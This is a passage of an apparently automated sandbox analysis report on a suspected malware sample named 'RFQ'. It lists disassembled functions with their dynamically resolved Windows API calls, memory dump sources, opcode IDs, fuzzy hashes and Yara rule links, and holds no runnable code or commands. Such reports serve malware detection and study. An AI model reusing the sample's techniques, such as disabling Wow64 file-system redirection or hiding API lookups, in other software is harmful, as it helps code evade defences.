                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                    • Opcode ID: 04aa286a09ed3090c12dfc60edd63ceee69b96c124d02e761cc7b743101cabba
                                                                                                                                                    • Instruction ID: fe806ade6cd255e6ad8c84af8c50e284d150142f923bbd0648041a39b0879a56
                                                                                                                                                    • Opcode Fuzzy Hash: 04aa286a09ed3090c12dfc60edd63ceee69b96c124d02e761cc7b743101cabba
                                                                                                                                                    • Instruction Fuzzy Hash: 19110A71200248BEEF209F69DC49FAB3769FF88754F014118FA45960A1D6BAE811D764
                                                                                                                                                    Function 00752287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00752350,?), ref: 007522A1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 007522A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                    • API String ID: 2574300362-340411864
                                                                                                                                                    • Opcode ID: 48f984fb99970e3aac8760c59384031ae8fd868dc881a46ddb10bdf4a3976c70
                                                                                                                                                    • Instruction ID: 201c925d05ced6655a4fa0ba625e3fa139728f6c350206a0e5096c0c4650f651
                                                                                                                                                    • Opcode Fuzzy Hash: 48f984fb99970e3aac8760c59384031ae8fd868dc881a46ddb10bdf4a3976c70
                                                                                                                                                    • Instruction Fuzzy Hash: 52E01A74690309ABDB205F70EC89BA83765B705706F50C430B102E51A1EBBD5845DF4C
                                                                                                                                                    Function 0075235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00752276), ref: 00752376
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0075237D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                    • API String ID: 2574300362-2819208100
                                                                                                                                                    • Opcode ID: 9ae0962be51b37a6b42090930cc16ab7775e123f9e3e2cc05dffce2d4f6b6dcb
                                                                                                                                                    • Instruction ID: 12c3f955a61ccf64588ec826e75cb23b36056a2562b47f50be4bb5beb81caa39
                                                                                                                                                    • Opcode Fuzzy Hash: 9ae0962be51b37a6b42090930cc16ab7775e123f9e3e2cc05dffce2d4f6b6dcb
                                                                                                                                                    • Instruction Fuzzy Hash: 4BE0B6B4549308ABDB305F60ED4DFA93B65B706706F118424F509E62B1FBBC5815CA5C
                                                                                                                                                    Function 007AAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                                                    • Opcode ID: 5a686dff1bee95d1d2383d1730b0f8f2a6b771f6762b8ec77cb8e093f99e0f09
                                                                                                                                                    • Instruction ID: 68573461fcd8e390220dcd040b83a858eae37602ad7cebc3808f3b556dfdcc6a
                                                                                                                                                    • Opcode Fuzzy Hash: 5a686dff1bee95d1d2383d1730b0f8f2a6b771f6762b8ec77cb8e093f99e0f09
                                                                                                                                                    • Instruction Fuzzy Hash: 1FE012B1805658FBDB109B50CD49EF973BCE749752F5005D2B946E1100E73D9B84EB32
                                                                                                                                                    Function 00792205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007921FB,?,007923EF), ref: 00792213
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00792225
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetProcessId$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-399901964
                                                                                                                                                    • Opcode ID: 1f6d74b26f28bd9506d4650a786c46deebdfc24abde8698db593c4ecd055bd9b
                                                                                                                                                    • Instruction ID: ecd96db4215dfd6470ff95d5587bf84908057617bf17f69c880d25062429ec92
                                                                                                                                                    • Opcode Fuzzy Hash: 1f6d74b26f28bd9506d4650a786c46deebdfc24abde8698db593c4ecd055bd9b
                                                                                                                                                    • Instruction Fuzzy Hash: 83D0A77440071AAFCB355F36FC0CB0176E9FB08300B02842DE841E2251EB7CDC818650
                                                                                                                                                    Function 007342F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,007342EC,?,007342AA,?), ref: 00734304
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00734316
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                                    • Opcode ID: 8237e003ec0c83c2b1e6f6813a8b2f500cdb5a5a3d3e033e912313973b89cc0f
                                                                                                                                                    • Instruction ID: 28047d916189ed0259e54ce128443dd4e090d24777cf0e646647261fca112a6b
                                                                                                                                                    • Opcode Fuzzy Hash: 8237e003ec0c83c2b1e6f6813a8b2f500cdb5a5a3d3e033e912313973b89cc0f
                                                                                                                                                    • Instruction Fuzzy Hash: 59D0A7704007169FD7345F65EC0CB0176E8AB08301F01842DE441E3163EBBCDC808610
                                                                                                                                                    Function 0073434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,007341BB,00734341,?,0073422F,?,007341BB,?,?,?,?,007339FE,?,00000001), ref: 00734359
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073436B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                                    • Opcode ID: fd496ddaca61203f0b6dd7b5411b32bc24b40f1bb2f98606bad8f302216a62e5
                                                                                                                                                    • Instruction ID: 8cb6cc195307cbae85174196100cd16f350f0cfb726f425c5827ee31c1f87ed9
                                                                                                                                                    • Opcode Fuzzy Hash: fd496ddaca61203f0b6dd7b5411b32bc24b40f1bb2f98606bad8f302216a62e5
                                                                                                                                                    • Instruction Fuzzy Hash: C4D0A7704007169FE7344F35EC0CB017AD8BB15715F01852DE4C1E3151EBBCEC808610
                                                                                                                                                    Function 00770564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0077052F,?,007706D7), ref: 00770572
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00770584
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                    • API String ID: 2574300362-1587604923
                                                                                                                                                    • Opcode ID: c05beb42eb66e2ac536e393f9d5f388816158846bbff3af3392e9ec32368e142
                                                                                                                                                    • Instruction ID: 2f69495df5756b88f2c166083d225ef927df8f12f800faf95e6bba453618802d
                                                                                                                                                    • Opcode Fuzzy Hash: c05beb42eb66e2ac536e393f9d5f388816158846bbff3af3392e9ec32368e142
                                                                                                                                                    • Instruction Fuzzy Hash: 38D05E704003169ACB305F25A808F0277E8AB08300B11C529E84592190E6BCC8818B60
                                                                                                                                                    Function 00770539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0077051D,?,007705FE), ref: 00770547
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00770559
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                    • API String ID: 2574300362-1071820185
                                                                                                                                                    • Opcode ID: af18fb3a775929a04c6d39bc7749b57f65679433a6fc01231a8c63dd1feba367
                                                                                                                                                    • Instruction ID: 46795a83e9cefffe8f96025b74700298d481e029eb285ba22d7171b7ed1815a8
                                                                                                                                                    • Opcode Fuzzy Hash: af18fb3a775929a04c6d39bc7749b57f65679433a6fc01231a8c63dd1feba367
                                                                                                                                                    • Instruction Fuzzy Hash: 10D0A77440071ADFCB308F69EC08F0176FCAB04705B11C42DE44AD2191E6BCCC818A51
                                                                                                                                                    Function 0078ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0078ECBE,?,0078EBBB), ref: 0078ECD6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0078ECE8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                                                    • Opcode ID: 27b9d034a809c7d517918273057db6b4b632e080ea8828f74d4a8f93af232750
                                                                                                                                                    • Instruction ID: 413f7ac8412842b7d554820fae5b145f4ee3aee55222fa99c88c4604ac08fba1
                                                                                                                                                    • Opcode Fuzzy Hash: 27b9d034a809c7d517918273057db6b4b632e080ea8828f74d4a8f93af232750
                                                                                                                                                    • Instruction Fuzzy Hash: 67D05E709407279ECB206B69AC48B0276E8AB04300B018429E84592191EBBCC8808720
                                                                                                                                                    Function 0078BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0078BAD3,00000001,0078B6EE,?,007CDC00), ref: 0078BAEB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0078BAFD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                                    • Opcode ID: 2fbc63be64513d8f336cfeb3274a3307e2d7f0724b9d3ff2b7cc8ecc1319c2f7
                                                                                                                                                    • Instruction ID: 14153819baba6ad18e53fc0971c4f995bb6e6056770e709bd48f0d56f3ec91a7
                                                                                                                                                    • Opcode Fuzzy Hash: 2fbc63be64513d8f336cfeb3274a3307e2d7f0724b9d3ff2b7cc8ecc1319c2f7
                                                                                                                                                    • Instruction Fuzzy Hash: DBD0A7B08407169FC730AF25EC4CF117AD8AB04300B01842DE843D3150EB7CCC81C714
                                                                                                                                                    Function 00793BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00793BD1,?,00793E06), ref: 00793BE9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00793BFB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                                    • Opcode ID: 25ad26511d0da76342d95a84bac4d26421dc9c5ef13d4091bc36203fbfa15030
                                                                                                                                                    • Instruction ID: b0ecc2bff15d331111958fca23b95c065129dda5c4c8239d5878bc02765b6d29
                                                                                                                                                    • Opcode Fuzzy Hash: 25ad26511d0da76342d95a84bac4d26421dc9c5ef13d4091bc36203fbfa15030
                                                                                                                                                    • Instruction Fuzzy Hash: 9DD0A7B0400B5AAFCF305F69FC08B13BBF8AB06314B118429E445E2190E6BCC8808E20
                                                                                                                                                    Function 00769B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 96a113f0ae75df7283ab88aca7b429ce5f34cd53c52d8187c7557305778c137f
                                                                                                                                                    • Instruction ID: 69b06964aab8fe30f50737b4201e87b4ad5fe50d7f32cc6151e177d91eb82951
                                                                                                                                                    • Opcode Fuzzy Hash: 96a113f0ae75df7283ab88aca7b429ce5f34cd53c52d8187c7557305778c137f
                                                                                                                                                    • Instruction Fuzzy Hash: A6C13E75A00216EFCB14DFA4C884AAEB7B9FF48714F104598EE06EB251D735EE41DBA0
                                                                                                                                                    Function 0078AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0078AAB4
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0078AABF
                                                                                                                                                      • Part of subcall function 00770213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077027B
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0078AACA
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0078AD9D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 780911581-0
                                                                                                                                                    • Opcode ID: 3b33396f957d60d206effc5761b574a75724fa73e4c002c77414accef2afa44a
                                                                                                                                                    • Instruction ID: 24ce11abb872e05ef329b87ced7516b2a3ff2c54e90860f85a8f3dcddbc1ca05
                                                                                                                                                    • Opcode Fuzzy Hash: 3b33396f957d60d206effc5761b574a75724fa73e4c002c77414accef2afa44a
                                                                                                                                                    • Instruction Fuzzy Hash: B3A16C75244701EFEB10EF14C485B1AB7E4BF88710F148449FA9A9B3A2CB78ED40CB96
                                                                                                                                                    Function 007691CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2808897238-0
                                                                                                                                                    • Opcode ID: cb539871f2247347f93d74d65e19b7c7a75f57d390cd2ec63f816f82173f604b
                                                                                                                                                    • Instruction ID: 3a1eccbbe85495c7b1cc90a1a70e58bfe80e566e3cd7aeaeca8b7d9d2aa7eff8
                                                                                                                                                    • Opcode Fuzzy Hash: cb539871f2247347f93d74d65e19b7c7a75f57d390cd2ec63f816f82173f604b
                                                                                                                                                    • Instruction Fuzzy Hash: DD516130604306DBDB249F6AD899A2EB7ADAF45310F24881FEA47DB3D1EB7898408715
